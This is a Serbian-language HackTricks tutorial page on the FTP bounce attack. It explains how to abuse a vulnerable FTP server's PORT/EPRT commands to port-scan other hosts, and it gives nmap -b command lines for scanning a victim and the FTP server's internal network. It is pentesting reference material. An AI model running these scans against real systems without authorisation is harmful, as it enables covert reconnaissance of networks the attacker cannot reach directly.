FTP Bounce attack - Scan
Tip
Učite i vežbajte AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Učite i vežbajte GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
Učite i vežbajte Azure Hacking:
HackTricks Training Azure Red Team Expert (AzRTE)
Podržite HackTricks
- Proverite planove pretplate!
- Pridružite se 💬 Discord grupi ili telegram grupi ili pratite nas na Twitteru 🐦 @hacktricks_live.
- Podelite hakerske trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.
FTP Bounce - Skeneranje
Ručno
- Povežite se na ranjivi FTP
- Koristite
PORTiliEPRT(ali samo jedan od njih) da uspostavite vezu sa <IP:Port> koji želite da skenirate:
PORT 172,32,80,80,0,8080EPRT |2|172.32.80.80|8080|
- Koristite
LIST(ovo će samo poslati povezanoj <IP:Port> listu trenutnih fajlova u FTP folderu) i proverite moguće odgovore:150 File status okay(To znači da je port otvoren) ili425 No connection established(To znači da je port zatvoren) - Umesto
LIST, možete takođe koristitiRETR /file/in/ftpi tražiti sličneOpen/Closeodgovore.
Primer korišćenja PORT (port 8080 na 172.32.80.80 je otvoren, a port 7777 je zatvoren):
.png)
Isti primer korišćenja EPRT (autentifikacija izostavljena na slici):
.png)
Otvoreni port koristeći EPRT umesto LIST (drugo okruženje)
.png)
nmap
nmap -b <name>:<pass>@<ftp_server> <victim>
nmap -Pn -v -p 21,80 -b ftp:ftp@10.2.1.5 127.0.0.1 #Scan ports 21,80 of the FTP
nmap -v -p 21,22,445,80,443 -b ftp:ftp@10.2.1.5 192.168.0.1/24 #Scan the internal network (of the FTP) ports 21,22,445,80,443
Tip
Učite i vežbajte AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Učite i vežbajte GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
Učite i vežbajte Azure Hacking:
HackTricks Training Azure Red Team Expert (AzRTE)
Podržite HackTricks
- Proverite planove pretplate!
- Pridružite se 💬 Discord grupi ili telegram grupi ili pratite nas na Twitteru 🐦 @hacktricks_live.
- Podelite hakerske trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.
HackTricks

